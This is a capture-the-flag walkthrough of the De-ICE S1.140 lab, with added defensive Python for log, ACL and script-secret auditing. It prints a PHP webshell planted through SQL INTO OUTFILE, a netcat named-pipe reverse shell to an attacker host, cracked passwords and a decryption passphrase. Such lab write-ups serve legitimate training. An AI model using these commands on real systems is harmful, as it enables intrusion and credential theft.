tags: de-ice

De-ICE S1.140

This is a walkthrough of how I completed the De-ICE S1.140 challenge. The final goal for this challenge is undocumented.

Nmap

[email protected]:~/de-ice/1.140# nmap -n -sV -A -p- 192.168.127.128

PORT    STATE  SERVICE  VERSION
21/tcp  open   ftp      ProFTPD 1.3.4a
| ftp-anon: Anonymous FTP login allowed (FTP code 230)
|_Can't get directory listing: ERROR
22/tcp  open   ssh      OpenSSH 5.9p1 Debian 5ubuntu1.1 (Ubuntu Linux; protocol 2.0)
| ssh-hostkey:
|   1024 08:c6:66:05:29:a6:bd:a0:0b:1b:93:0a:0f:03:42:b0 (DSA)
|   2048 90:c1:ed:5e:f1:cb:6f:af:23:5b:c5:9f:98:03:27:71 (RSA)
|_  256 05:c2:e3:f5:7a:37:c4:95:62:2e:43:8b:df:26:33:1a (ECDSA)
80/tcp  open   http     Apache httpd 2.2.22 ((Ubuntu) mod_ssl/2.2.22 OpenSSL/1.0.1)
|_http-title: Lazy Admin Corp.
443/tcp open   ssl/http Apache httpd 2.2.22 ((Ubuntu) mod_ssl/2.2.22 OpenSSL/1.0.1)
|_http-title: Lazy Admin Corp.
| ssl-cert: Subject: commonName=webhost
| Not valid before: 2014-04-21T20:14:28+00:00
|_Not valid after:  2024-04-18T20:14:28+00:00
|_ssl-date: 2014-04-21T21:19:59+00:00; -3s from local time.
465/tcp closed smtps
993/tcp open   ssl/imap Dovecot imapd
|_imap-capabilities: more ID IMAP4rev1 post-login AUTH=PLAIN Pre-login capabilities listed SASL-IR OK ENABLE have AUTH=LOGINA0001 LOGIN-REFERRALS LITERAL+ IDLE
| ssl-cert: Subject: commonName=webhost
| Not valid before: 2014-04-21T20:14:28+00:00
|_Not valid after:  2024-04-18T20:14:28+00:00
|_ssl-date: 2014-04-21T21:19:59+00:00; -3s from local time.
995/tcp open   ssl/pop3 Dovecot pop3d
|_pop3-capabilities: RESP-CODES PIPELINING CAPA SASL(PLAIN LOGIN) USER UIDL TOP
| ssl-cert: Subject: commonName=webhost
| Not valid before: 2014-04-21T20:14:28+00:00
|_Not valid after:  2024-04-18T20:14:28+00:00
|_ssl-date: 2014-04-21T21:19:59+00:00; -3s from local time.

Visiting both the HTTP and HTTPS pages greets us with the same page.

Wfuzz

I ran Wfuzz against both the HTTP and HTTPS services and got different results for each.

[email protected]:~/de-ice/1.140# wfuzz -c -zfile,/usr/share/wfuzz/wordlist/general/common.txt --hc 404 http://192.168.127.128/FUZZ/

********************************************************
* Wfuzz  2.0 - The Web Bruteforcer                     *
********************************************************

Target: http://192.168.127.128/FUZZ/
Payload type: file,/usr/share/wfuzz/wordlist/general/common.txt
Total requests: 950

==================================================================
ID     Response   Lines      Word         Chars          Request   
==================================================================
00191:  C=403      8 L           22 W         210 Ch       " - cgi-bin"
00290:  C=403      8 L           22 W         206 Ch       " - doc"
00431:  C=403      8 L           22 W         208 Ch       " - icons"
00849:  C=200     97 L          525 W        7348 Ch       " - forum"


[email protected]:~/de-ice/1.140# wfuzz -c -z file,/usr/share/wfuzz/wordlist/general/common.txt --hc 404 https://192.168.127.128/FUZZ/

********************************************************
* Wfuzz  2.0 - The Web Bruteforcer                     *
********************************************************

Target: https://192.168.127.128/FUZZ/
Payload type: file,/usr/share/wfuzz/wordlist/general/common.txt
Total requests: 950

==================================================================
ID     Response   Lines      Word         Chars          Request   
==================================================================
00184:  C=403      8 L           22 W         210 Ch       " - cgi-bin"
00295:  C=403      8 L           22 W         206 Ch       " - doc"
00375:  C=200     97 L          525 W        7348 Ch       " - forum"
00424:  C=403      8 L           22 W         208 Ch       " - icons"
00624:  C=200    126 L          465 W        7540 Ch       " - phpmyadmin"
00913:  C=302      0 L            0 W           0 Ch       " - webmail"

LazyAdmin corp. Forums

I decided to have a look at the /forum/ directory that Wfuzz found; as far as I could tell the content was identical over HTTP and HTTPS. There were several threads to look through. The ‘Login Attacks’ thread contains a snippet from the SSH auth log with a lot of usernames in it. I copied this information to a file, then used some command line magic to extract a list of users.

[email protected]:~/de-ice/1.140# grep "invalid user" auth.log | cut -d" " -f9,11 | grep -v "invalid" | sort -u

A very interesting line popped up, which distinctly resembled a password - the obvious implication is that somebody typed their password as their username by mistake. To find the possible corresponding user, I went back through the log to read the full line. The attempt came from 10.0.0.23, so I searched for other login attempts from the same IP - only one user came up: mbrown.
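The grep/cut/sort pipeline above and the reasoning that followed it (a rejected "username" that looks like a password, traced back to the one real account tried from the same address) are worth having as a repeatable check, because the same mistake shows up in production auth logs and the password is then sitting in a file that far more people can read than the password database. The Python below is an added example, not code from the original writeup: it parses sshd lines in the same format, reproduces the unique-user list, then groups rejected names by source address and flags any that do not fit the shape of a login name at all. The log excerpt, host name, addresses and the flagged string are all constructed for this example.

```python
import re
from collections import defaultdict

# Constructed sshd auth.log excerpt in the format the forum thread quoted.
# Host name, addresses and the rejected "username" are made up for the example.
SAMPLE_AUTH_LOG = """\
Apr 21 20:01:40 webhost sshd[2214]: Invalid user Tr0ub4dor&3 from 10.0.0.23
Apr 21 20:01:40 webhost sshd[2214]: input_userauth_request: invalid user Tr0ub4dor&3 [preauth]
Apr 21 20:01:42 webhost sshd[2214]: Failed password for invalid user Tr0ub4dor&3 from 10.0.0.23 port 51020 ssh2
Apr 21 20:02:05 webhost sshd[2218]: Failed password for mbrown from 10.0.0.23 port 51031 ssh2
Apr 21 20:05:44 webhost sshd[2230]: Invalid user admin from 10.0.0.99
Apr 21 20:05:50 webhost sshd[2232]: Invalid user oracle from 10.0.0.99
Apr 21 20:05:55 webhost sshd[2234]: Invalid user test from 10.0.0.99
"""

# "Invalid user X from IP" and "Failed password for invalid user X from IP ..."
INVALID_RE = re.compile(r"[Ii]nvalid user (\S+) from (\S+)")
# Attempts against accounts that do exist (name not preceded by "invalid user").
KNOWN_RE = re.compile(r"(?:Failed password|Accepted \w+) for (?!invalid user)(\S+) from (\S+)")
# Conventional Linux login names: lowercase, start with a letter or underscore, at most 32 chars.
USERNAME_RE = re.compile(r"^[a-z_][a-z0-9_.-]{0,31}$")


def parse_auth_log(text):
    """Return (kind, user, source_ip) tuples; kind is 'invalid' or 'known'."""
    events = []
    for line in text.splitlines():
        m = INVALID_RE.search(line)
        if m:
            events.append(("invalid", m.group(1), m.group(2)))
            continue
        m = KNOWN_RE.search(line)
        if m:
            events.append(("known", m.group(1), m.group(2)))
    return events


def unique_invalid_users(events):
    """Same result as the grep | cut | sort -u pipeline: every rejected name, once."""
    return sorted({user for kind, user, _ in events if kind == "invalid"})


def looks_like_password(name):
    """Heuristic: a rejected 'username' that cannot be a login name is probably a secret."""
    return USERNAME_RE.match(name) is None


def suspected_leaks(events):
    """Pair each password-shaped rejected name with the real accounts tried from the same source."""
    by_source = defaultdict(lambda: {"invalid": set(), "known": set()})
    for kind, user, ip in events:
        by_source[ip][kind].add(user)
    findings = []
    for ip, seen in sorted(by_source.items()):
        for name in sorted(seen["invalid"]):
            if looks_like_password(name):
                findings.append({"candidate": name, "source": ip,
                                 "other_users": sorted(seen["known"])})
    return findings


if __name__ == "__main__":
    evs = parse_auth_log(SAMPLE_AUTH_LOG)
    print("rejected names:", unique_invalid_users(evs))
    for f in suspected_leaks(evs):
        print(f"possible password in username field from {f['source']}: "
              f"{f['candidate']!r}; accounts tried from there: {f['other_users']}")
```

Running it on a real auth.log is a matter of passing the file contents to parse_auth_log. The heuristic is deliberately loose (anything with uppercase, punctuation beyond `._-`, or a leading digit); on a busy Internet-facing host it will also flag scanner noise, so the pairing with real accounts from the same source is what turns a flag into a finding worth a password reset.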

I attempted to log in through SSH with these credentials, but they failed: it seems SSH on this server requires public-key authentication.

I was however able to log into the forum as mbrown. I had a look through the user profile area and found mbrown’s email address: [email protected]

SquirrelMail

With this information, I went straight back to the /webmail/ directory I found earlier and was able to log in as mbrown with the same credentials.

There were a handful of emails in the INBOX and Sent folders, which revealed the root passwords for MySQL and phpmyadmin. Knowing I had the URL for phpmyadmin also, I headed straight there!

phpMyAdmin

I had a look through the databases present, particularly those for the forum and mail services. I was able to retrieve a handful of users and password hashes for each service. I used hash-identifier to identify the type of hash in each case. The mail hashes were reported to be MD5, but the forum hashes were not identified; presumably they are generated in a custom way by the ‘my little forum’ application. I decided not to press ahead with cracking the MD5 hashes before spending the time to investigate the other hashes.

I cracked two of the MD5 hashes with john.

[email protected]:~/de-ice/1.140# john --rules --format=raw-md5 --wordlist=/usr/share/wordlists/darkc0de.lst mail 
Austin-Willard   (sw @ lazyadmin.corp)
tum-ti-tum       (rh @ lazyadmin.corp)

I logged into the webmail of these two users, but found nothing further of interest.

PHP Code Execution

There was an opportunity to leverage the current access I had in phpmyadmin, to gain me a remote shell on the system. Since I was unable to get in through SSH, this seemed like a viable option.

Using the SQL query window, I ran the following:

SELECT "<? system($_REQUEST['cmd']); ?>" INTO OUTFILE "/var/www/cmd.php"

This failed, as the service didn’t have the privilege required to write directly into /var/www/. Instead, I looked for writable directories within the ‘my little forum’ directory. According to the installation requirements of this application, the templates_c directory should be writable. A quick test in the browser showed that I could indeed access this directory. I altered the SQL query accordingly, and it ran successfully. I then visited my new file, and command execution was successful.

I thought I would try to use this code execution to obtain a netcat shell, but it seemed the version running on the remote host was not compiled with support for the -e option. Instead, I used the named pipe technique to obtain an interactive shell.

http://192.168.127.128/forum/templates_c/cmd.php?cmd=mknod /var/www/forum/templates_c/backpipe p
https://192.168.127.128/forum/templates_c/cmd.php?cmd=/bin/bash 0</var/www/forum/templates_c/backpipe | nc 192.168.127.127 4444 1>/var/www/forum/templates_c/backpipe
[email protected]:~/de-ice/1.140# nc -lnvp 4444
python -c 'import pty;pty.spawn("/bin/bash")'

At this point I did some standard enumeration: users and their groups, etc. It seems that swillard is the only user in the sudo group, so that account would most likely be my final target. I also came across /opt/backup.sh, which had an interesting ACL set.

mbrown:x:1001:1001:Mark Brown
rhedley:x:1002:1002:Richard Hedley
swillard:x:1003:1003:Sandy Willard
mparker:x:1004:1004:Miles Parker
ftpuser:x:997:rhedley,mbrown,ftp
ftpadmin:x:999:rhedley,swillard
sshlogin:x:998:swillard,mbrown
sudo:x:27:swillard
[email protected]:/$ getfacl /opt/backup.sh
getfacl /opt/backup.sh
getfacl: Removing leading '/' from absolute path names
# file: opt/backup.sh
# owner: root
# group: root
user::rwx
group::rw-
group:ftpadmin:r--
mask::rw-
other::---
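Why the ftpadmin members could read this file follows from the access-check order in acl(5): owner first, then named users, then the owning group and named groups, and the mask entry caps every entry in those middle classes, so group:ftpadmin:r-- is already the effective permission and group::rw- only ever applies to members of root's own group. The Python below is an added example, not part of the original writeup: it parses the getfacl output above and computes effective access per account, using the /etc/group excerpt above as its group table. It assumes each user's primary group is a user-private group with the same name (the passwd lines show uid equal to gid, but the group names themselves are not on the page).

```python
# Added example: POSIX ACL evaluation over getfacl(1) text output.
# The ACL text is the one shown for /opt/backup.sh; the group table is the
# /etc/group excerpt from the enumeration. Assumption: each user's primary
# group carries the user's own name (user-private groups).

GETFACL_OUTPUT = """\
# file: opt/backup.sh
# owner: root
# group: root
user::rwx
group::rw-
group:ftpadmin:r--
mask::rw-
other::---
"""

GROUP_DB = {
    "ftpuser": {"rhedley", "mbrown", "ftp"},
    "ftpadmin": {"rhedley", "swillard"},
    "sshlogin": {"swillard", "mbrown"},
    "sudo": {"swillard"},
}

ALL = {"r", "w", "x"}


def parse_getfacl(text):
    """Return owner, owning group and the ACL entries as (tag, qualifier, perms) tuples."""
    owner = group = None
    entries = []
    for raw in text.splitlines():
        line = raw.split("#effective:")[0].strip()  # getfacl may append effective perms as a comment
        if not line:
            continue
        if line.startswith("# owner:"):
            owner = line.split(":", 1)[1].strip()
        elif line.startswith("# group:"):
            group = line.split(":", 1)[1].strip()
        elif line.startswith("#"):
            continue
        else:
            tag, qualifier, perms = line.split(":")
            entries.append((tag, qualifier, set(perms) & ALL))
    return {"owner": owner, "group": group, "entries": entries}


def effective_perms(acl, user, groups):
    """acl(5) check order: owner, named user, owning/named groups (masked), otherwise other."""
    entries = acl["entries"]
    mask = next((p for t, q, p in entries if t == "mask"), ALL)
    if user == acl["owner"]:
        return next(p for t, q, p in entries if t == "user" and q == "")
    for t, q, p in entries:
        if t == "user" and q == user:
            return p & mask
    granted, matched = set(), False
    for t, q, p in entries:
        owning = t == "group" and q == "" and acl["group"] in groups
        named = t == "group" and q != "" and q in groups
        if owning or named:
            matched = True
            granted |= p & mask  # granted if any matching group entry allows the access
    if matched:
        return granted
    return next(p for t, q, p in entries if t == "other")


def groups_of(user, group_db):
    """Primary group (assumed to share the user's name) plus supplementary groups."""
    return {user} | {g for g, members in group_db.items() if user in members}


def who_can(acl, group_db, perm="r"):
    """Every account in the group table (plus root) whose effective ACL grants `perm`."""
    accounts = {"root"} | {m for members in group_db.values() for m in members}
    return sorted(u for u in accounts if perm in effective_perms(acl, u, groups_of(u, group_db)))


if __name__ == "__main__":
    acl = parse_getfacl(GETFACL_OUTPUT)
    print("can read  :", who_can(acl, GROUP_DB, "r"))
    print("can write :", who_can(acl, GROUP_DB, "w"))
```

Run against the output of `getfacl -R` over directories that hold scripts or credentials, a who_can listing is a quick way to find files whose readers include accounts that are not administrators, which is exactly the gap this ACL opened.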

I already had some cracked email passwords for swillard and rhedley (two users in the ftpadmin group), so tried them with su.

The password for rhedley worked and I was able to read the backup.sh file. This contained an openssl command to create the encrypted backup file I retrieved via FTP earlier. I used this information to decrypt and extract the archive.

openssl aes-256-cbc -in ${TMPBACKUP}/${FILENAME}.gz -out ${TMPBACKUP}/${FILENAME}.gz.enc -pass pass:wpaR9V616xrDTy98L7Uje2DDU5hWtWhs
[email protected]:~/de-ice/1.140# openssl aes-256-cbc -d -in backup_webhost_130111.tar.gz.enc -out backup_webhost_130111.tar.gz -pass pass:wpaR9V616xrDTy98L7Uje2DDU5hWtWhs
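The weakness in backup.sh is not the cipher but the key: a literal password on the openssl command line, inside a script that a non-root group could read, protects the archive only as well as that script's permissions do. The Python below is an added example, not code from the original writeup: a small audit that scans shell scripts for credentials embedded in command lines (the openssl -pass pass: and -k forms, MYSQL_PWD= assignments, --password= options) and reports them with the secret redacted. The script fragment it runs on is constructed to resemble backup.sh, with placeholder values rather than anything from the target; the final line, which reads the passphrase from a root-only key file via -pass file:, is the shape the scanner is meant to leave alone.

```python
import re

# Constructed script text modelled on the /opt/backup.sh fragment; the password
# and database credential here are placeholders, not values from the target.
SAMPLE_SCRIPT = """\
#!/bin/bash
TMPBACKUP=/tmp/backup
FILENAME=backup_webhost_$(date +%y%m%d).tar
tar czf ${TMPBACKUP}/${FILENAME}.gz /etc /var/www
openssl aes-256-cbc -in ${TMPBACKUP}/${FILENAME}.gz -out ${TMPBACKUP}/${FILENAME}.gz.enc -pass pass:EXAMPLE_NOT_A_REAL_PASSWORD
MYSQL_PWD=example123 mysqldump --all-databases > ${TMPBACKUP}/db.sql
openssl aes-256-cbc -in ${TMPBACKUP}/db.sql -out ${TMPBACKUP}/db.sql.enc -pass file:/root/.backup_key
"""

# Each pattern captures the secret itself so the report can redact it.
PATTERNS = [
    ("openssl inline password (-pass pass:)", re.compile(r"-pass\s+pass:(\S+)")),
    ("openssl inline password (-k)", re.compile(r"(?:^|\s)-k\s+(\S+)")),
    ("MYSQL_PWD in environment assignment", re.compile(r"\bMYSQL_PWD=(\S+)")),
    ("--password= on command line", re.compile(r"--password=(\S+)")),
]


def redact(secret):
    """Keep two leading characters so a finding can be matched to its line; hide the rest."""
    if len(secret) <= 2:
        return "**"
    return secret[:2] + "*" * (len(secret) - 2)


def find_inline_secrets(script_text):
    """Report each line that carries a credential as a literal argument or env assignment."""
    findings = []
    for lineno, line in enumerate(script_text.splitlines(), 1):
        for label, pattern in PATTERNS:
            m = pattern.search(line)
            if m:
                findings.append({"line": lineno, "kind": label, "secret": redact(m.group(1))})
    return findings


if __name__ == "__main__":
    for f in find_inline_secrets(SAMPLE_SCRIPT):
        print(f"line {f['line']}: {f['kind']}: {f['secret']}")
```

The fix the scanner points toward is the one its last sample line shows: keep the passphrase in a separate file readable only by the account that runs the backup, reference it with -pass file:, and then the ACL on the script itself no longer decides who can decrypt the archives.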

More John

Within the archive was a backed up /etc/ directory, with a shadow file containing hashes for rhedley, mbrown and sraines. Raines is now Willard, so assuming her password wasn’t changed when her name was, cracking her password will give us access to a sudo-enabled account.

It took a long time for john to crack this one, as the SHA-512 crypt hash used in the shadow file is slow to compute.

[email protected]:~/de-ice/1.140# john --rules --wordlist=/usr/share/wordlists/darkc0de.lst etc/shadow
brillantissimo   (sraines)

Back to the Shell

From the rhedley account, which I was still logged in as, I tried to su to the swillard account with the newly cracked password.

Within the root folder was a file called secret.jpg, which I downloaded to my machine via netcat.

There didn’t appear to be any hidden messages either in the image itself or in its hex dump, so I assume this was the final flag.